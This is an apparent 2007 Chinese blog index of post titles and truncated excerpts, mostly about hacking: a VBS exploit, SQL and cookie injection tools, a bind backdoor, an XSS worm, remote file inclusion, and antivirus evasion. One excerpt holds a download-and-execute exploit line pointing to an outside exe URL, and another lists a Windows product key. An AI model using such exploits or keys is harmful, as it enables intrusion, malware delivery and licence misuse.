jahn的专栏

己所不欲,勿施于人

vbs也写EXP]xunlei_0day_exp

 来源:vbs空间exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )code by NetPatchif exeurl code="...

2007-11-19 19:08:00

阅读数:394

评论数:0

cookies注入加速工具-PHP版

作者:职业欠钱来源:职业欠钱&zj1244共用的public Blog/*cookies 注入也加速 工具 PHP版by 职业欠钱最近遇到一个挂了防注入的东东,COOKIE注入可行,不过手工注入太辛苦了,便四处寻找加速工具mika的工具依赖于SQL 错误开启的模式,而我遇到的这个是不显示错...

2007-11-19 19:07:00

阅读数:750

评论数:0

谈VBS在Hacking中的作用之二

NetPatch此文已经发于黑客手册第十一期上一期写了一个VBS的注入脚本,这次给大家带来两个脚本,希望小菜们能喜欢。一.挑选速度快的肉鸡做VPN。当自己从小菜鸟转型为老菜鸟时,就懂得考虑在玩Hacking的同时也要尽量保证不暴露自己。万事,安全第一嘛!不然都不知道哪天玩着玩着就被警察叔叔带去喝茶...

2007-11-17 23:28:00

阅读数:443

评论数:0

谈VBS在Hacking中的作用———SQL Inject中的应用

本文,已发于《黑客手册》07年10月刊平常我们遇到有注入漏洞一类的网站大部分人都是用NBSI Or 阿D一类的注射工具。但有的站点的注射点很难构造,或者说注射语句比较特殊。如果用手工去注射的话,费时又费力!但自己写针对性的工具的话,对一些刚入门不久或不会编程的朋友来说,实在是一件很痛苦的事情。因此...

2007-11-17 23:27:00

阅读数:509

评论数:0

WINDOWS2003的密钥

jk6jc-p7p7h-4hrfc-3xm7p-g33hm 

2007-11-14 20:19:00

阅读数:872

评论数:0

常用工具名词解释

webadv:针对iis+sp3的溢出成功率很高(溢出后system权限!)   ipscan:大范围网段快速ipc猜解   svc:远程安装/删除Win2k服务   3389.vbs:远程安装Win2k终端服务不需i386   arpsniffer:arp环境sniffer(需要Winpcap2...

2007-11-14 13:08:00

阅读数:704

评论数:0

也谈跨站脚本攻击与防御

网络上曾经有过关于跨站脚本攻击与防御的文章,但是随着攻击技术的进步,以前的关于跨站脚本攻击的看法与理论已经不能满足现在的攻击与防御的需要了,而且由于这种对于跨站脚本认识上的混乱,导致现在很多的程序包括现在的动网都存在着跨站脚本过滤不严的问题,希望本文能给写程序的与研究程序的带来一点思路。还是首先看...

2007-11-13 13:15:00

阅读数:323

评论数:0

Bind后门

 Bind后门.体积仅有629字节!!!!支持多用户登录,多线程支持!!!屏蔽了.安装,过主防等危害功能...主页:www.eviloctal.comEmail:Anskya[AT]Gmail.comAnskya 加入E.S.T第一个作品,请大家多多支持和帮助我感谢曾经帮助过和支持过我的朋友们,谢...

2007-11-08 12:52:00

阅读数:303

评论数:0

完整XSS wrom入侵流程

完整XSS wrom入侵流程不说废话,且看怎么实现,我先拿SOHU BLOG做示范.1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,//前是真正的空格),在个人档案处看过滤了哪些.’’;:!--"=&#{()} //结果’’;:!--&q...

2007-11-08 12:52:00

阅读数:291

评论数:0

HTML语法大全,送给初学者!

  批注 跑马灯 ...普通卷动 ...滑动 ...预设卷动 ...来回卷动 ...向下卷动 ...向上卷动 向右卷动 向左卷动 ...卷动次数 ...设定宽度 ...设定高度 ...设定背景颜色 ...设定卷动距离 ...设定卷动时间 字体效果 ...标题字(最大) ...标题字(最小) .....

2007-11-08 12:50:00

阅读数:276

评论数:0

VLAN虚拟局域网 从入门到精通

一、什么是三层交换和VLAN  要回答这个问题我们还是先看看以太网的工作原理。以太网的工作原理是利用二进制位形成的一个个字节组合成一帧帧的数据(其实是一些电脉冲)在导线中进行传播。   首先,以太网网段上需要进行数据传送的节点对导线进行监听,这个过程称为CSMA/CD(Carrier Sense ...

2007-11-06 19:17:00

阅读数:418

评论数:0

在线推广网站的14招

1、将你的网站提交到搜索引擎,这样你的网站就有了最大暴光率的可能性;   2、如果你期望得到更多的暴光机会,你可以付费进行搜索引擎营销 (Search Engine Marketing) 。当浏览者用固定的关键词搜索时,就会有在搜索引擎网站上出现你网站的文字广告;   3、开展一个抽奖活动。在一定...

2007-11-05 21:25:00

阅读数:248

评论数:0

网站优化设计的含义

在搜索引擎优化系列文章的第一部分和第二部分,分别介绍了搜索引擎优化中片面追求google PageRank,以及没有充分认识网站建设和网站推广之间关系的问题,使得许多企业在策划和建设阶段没有做好企业网站的优化设计工作,而在进行搜索引擎推广时才不得不面对这一尴尬的问题,由于这些简单的错误而影响了网站...

2007-11-05 21:24:00

阅读数:313

评论数:0

免杀的简单原理

免杀,顾名思义就是说避免被杀毒软件查杀! 免杀的方法也有很多种,针对不同的情况我们运用不同的免杀方法。 ⒈文件免杀:加花/修改文件特征码/加壳/修改加壳后的文件。 ⒉内存免杀:修改特征码。 ⒊行为免杀。 现在我来揭开免杀神秘的面纱。(这里不对免杀做深入讨论,只对原理进行分析,毕竟这不是黑客教程) ...

2007-11-05 21:07:00

阅读数:327

评论数:0

热门技术探讨之跨站式入侵(图) (heibai)

最近朋友们老是弄些跨站,一会看这个站被跨站 那个站又被跨站,我看也无聊 顺便弄一些玩玩,到百度上随便搜索了几个站的地址  结果一 测试  全都可以弄,这不得不让人很担心啊。 以下是几个站的截图和地址 TOM网 http://search.tom.com/search.php?f=8&cl=...

2007-11-04 18:12:00

阅读数:286

评论数:0

guppy 4.6.3远程文件共享

vuln.: GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion script info and download: http://www.freeguppy.org/ dork: "Site powered by Gup...

2007-11-03 19:00:00

阅读数:474

评论数:0

黑客瞄准IE7高危漏洞

微软近日警告用户注意防范可疑的网站和E-Mail带来的危险,因为Internet Explorer 7已经被公开出一个未修补的漏洞.公司并没有详细指出相关的细节,但宣称有一小部分黑客已经开始利用它.这一漏洞依然来自问题频发的uniform resource indicator (URI)命令控制中...

2007-11-03 18:57:00

阅读数:224

评论数:0

关于doc命令可以同时执行两条的困扰

前段时间,有个关于foxdocmd的本地溢出远程执行命令的漏洞被公布,但是 只可以执行一条命令。非常郁闷。想到了vbs的执行代码,可是还是只可以执行一行,也就是说在cmd下只可以执行一条命令。实验了很多次都以失败告终,还有就是cmd下的/c命令也是很是郁闷。今天一个同事利用了"&...

2007-11-03 18:56:00

阅读数:326

评论数:0

QQ Traveler漏洞分析与利用

漏洞概述腾讯TT(QQ Traveler)是一款多页面浏览器,具有亲切、友好的用户界面,提供多种皮肤供用户根据个人喜好使用,另外TT更是新增了多项人性化的特色功能,使上网冲浪变的更加轻松自如、省时省力。智能屏蔽一键开通, 最近浏览一键找回,多页面一键打开,浏览记录一键清除,多种皮肤随心变换,多线程...

2007-11-02 18:55:00

阅读数:366

评论数:0

提示
确定要删除当前文章?
取消 删除
关闭
关闭